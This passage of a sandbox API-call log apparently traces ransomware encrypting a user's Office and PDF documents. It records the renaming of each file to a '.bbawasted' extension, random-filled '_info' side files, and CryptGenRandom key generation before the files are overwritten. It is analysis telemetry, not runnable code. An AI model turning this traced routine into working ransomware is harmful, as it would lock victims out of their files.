lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.983] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.983] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PUbWuWs.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pubwuws.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PUbWuWs.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pubwuws.docx.bbawasted")) returned 1 [0071.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PUbWuWs.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pubwuws.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.984] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0071.984] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x4392 [0071.984] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4392) returned 0x570000 [0071.984] CloseHandle (hObject=0xf8) returned 1 [0071.986] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.987] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.987] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.987] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.988] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.988] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.999] SetEndOfFile (hFile=0x120) returned 1 [0072.001] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0072.001] CloseHandle (hObject=0x120) returned 1 [0072.003] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0072.003] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0f58 | out: hHeap=0x580000) returned 1 [0072.003] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.004] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.004] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.004] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RcSKXbECzf5mRR4OJ.xlsx") returned 66 [0072.004] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28e) returned 0x5c77b0 [0072.004] lstrcpyW (in: lpString1=0x5c7834, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.004] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0072.004] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.005] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0072.005] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RcSKXbECzf5mRR4OJ.xlsx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rcskxbeczf5mrr4oj.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.124] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.125] SetEndOfFile (hFile=0x120) returned 1 [0072.125] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.125] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0072.125] lstrcpyW (in: lpString1=0x5c7834, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.125] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RcSKXbECzf5mRR4OJ.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rcskxbeczf5mrr4oj.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RcSKXbECzf5mRR4OJ.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rcskxbeczf5mrr4oj.xlsx.bbawasted")) returned 1 [0072.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RcSKXbECzf5mRR4OJ.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rcskxbeczf5mrr4oj.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.126] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.126] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xbbdd [0072.126] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbbdd) returned 0x570000 [0072.126] CloseHandle (hObject=0x11c) returned 1 [0072.130] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.130] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.130] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.130] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.131] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.131] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.139] SetEndOfFile (hFile=0x120) returned 1 [0072.141] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0072.141] CloseHandle (hObject=0x120) returned 1 [0072.143] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0072.143] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2da8 | out: hHeap=0x580000) returned 1 [0072.143] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.144] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.144] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.144] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TEaezrsRO.xlsx") returned 58 [0072.144] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27e) returned 0x5d0700 [0072.144] lstrcpyW (in: lpString1=0x5d0774, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.144] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0072.144] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.145] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0072.145] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TEaezrsRO.xlsx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\teaezrsro.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.145] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.146] SetEndOfFile (hFile=0x120) returned 1 [0072.146] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.146] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0072.146] lstrcpyW (in: lpString1=0x5d0774, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.146] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TEaezrsRO.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\teaezrsro.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TEaezrsRO.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\teaezrsro.xlsx.bbawasted")) returned 1 [0072.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TEaezrsRO.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\teaezrsro.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.147] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.147] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x12a6c [0072.147] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12a6c) returned 0xfe0000 [0072.147] CloseHandle (hObject=0xf8) returned 1 [0072.151] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.152] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.152] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.152] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.152] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.152] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.161] SetEndOfFile (hFile=0x120) returned 1 [0072.163] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0072.163] CloseHandle (hObject=0x120) returned 1 [0072.165] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0072.165] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d1028 | out: hHeap=0x580000) returned 1 [0072.165] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.166] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.166] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.166] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ukA4uv2Pqg9_sQ.pdf") returned 62 [0072.166] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x286) returned 0x5abbd8 [0072.166] lstrcpyW (in: lpString1=0x5abc54, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.166] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0072.166] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.167] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0072.167] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ukA4uv2Pqg9_sQ.pdf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uka4uv2pqg9_sq.pdf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.215] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.216] SetEndOfFile (hFile=0x120) returned 1 [0072.217] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.217] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0072.217] lstrcpyW (in: lpString1=0x5abc54, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ukA4uv2Pqg9_sQ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uka4uv2pqg9_sq.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ukA4uv2Pqg9_sQ.pdf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uka4uv2pqg9_sq.pdf.bbawasted")) returned 1 [0072.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ukA4uv2Pqg9_sQ.pdf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uka4uv2pqg9_sq.pdf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.217] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.218] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x1b63 [0072.218] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1b63) returned 0x570000 [0072.218] CloseHandle (hObject=0xfc) returned 1 [0072.219] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.220] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.220] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.220] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.221] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.221] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.229] SetEndOfFile (hFile=0x120) returned 1 [0072.231] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca680 | out: hHeap=0x580000) returned 1 [0072.231] CloseHandle (hObject=0x120) returned 1 [0072.232] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abbd8 | out: hHeap=0x580000) returned 1 [0072.232] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cea78 | out: hHeap=0x580000) returned 1 [0072.233] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.233] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.233] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.233] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xwCdBOvfw-zjPZDc.xlsx") returned 65 [0072.233] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28c) returned 0x5bf070 [0072.233] lstrcpyW (in: lpString1=0x5bf0f2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.233] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5ca680 [0072.233] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.234] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5ca680 | out: pbBuffer=0x5ca680) returned 1 [0072.234] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xwCdBOvfw-zjPZDc.xlsx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xwcdbovfw-zjpzdc.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.235] WriteFile (in: hFile=0x120, lpBuffer=0x5ca680*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5ca680*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.236] SetEndOfFile (hFile=0x120) returned 1 [0072.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.236] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca680 | out: hHeap=0x580000) returned 1 [0072.236] lstrcpyW (in: lpString1=0x5bf0f2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.236] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xwCdBOvfw-zjPZDc.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xwcdbovfw-zjpzdc.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xwCdBOvfw-zjPZDc.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xwcdbovfw-zjpzdc.xlsx.bbawasted")) returned 1 [0072.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xwCdBOvfw-zjPZDc.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xwcdbovfw-zjpzdc.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.237] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.237] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x76a9 [0072.237] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x76a9) returned 0x570000 [0072.237] CloseHandle (hObject=0x11c) returned 1 [0072.239] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.240] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.240] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.240] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.241] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.241] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.249] SetEndOfFile (hFile=0x120) returned 1 [0072.251] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca680 | out: hHeap=0x580000) returned 1 [0072.251] CloseHandle (hObject=0x120) returned 1 [0072.255] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.255] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be7e0 | out: hHeap=0x580000) returned 1 [0072.255] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.256] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.256] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.256] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YYhpcSeMrvwH_H80E0.pptx") returned 67 [0072.256] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x290) returned 0x5be7e0 [0072.256] lstrcpyW (in: lpString1=0x5be866, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.256] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5ca680 [0072.256] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.257] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5ca680 | out: pbBuffer=0x5ca680) returned 1 [0072.257] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YYhpcSeMrvwH_H80E0.pptx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yyhpcsemrvwh_h80e0.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.273] WriteFile (in: hFile=0x120, lpBuffer=0x5ca680*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5ca680*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.274] SetEndOfFile (hFile=0x120) returned 1 [0072.274] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.275] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca680 | out: hHeap=0x580000) returned 1 [0072.275] lstrcpyW (in: lpString1=0x5be866, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YYhpcSeMrvwH_H80E0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yyhpcsemrvwh_h80e0.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YYhpcSeMrvwH_H80E0.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yyhpcsemrvwh_h80e0.pptx.bbawasted")) returned 1 [0072.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YYhpcSeMrvwH_H80E0.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yyhpcsemrvwh_h80e0.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 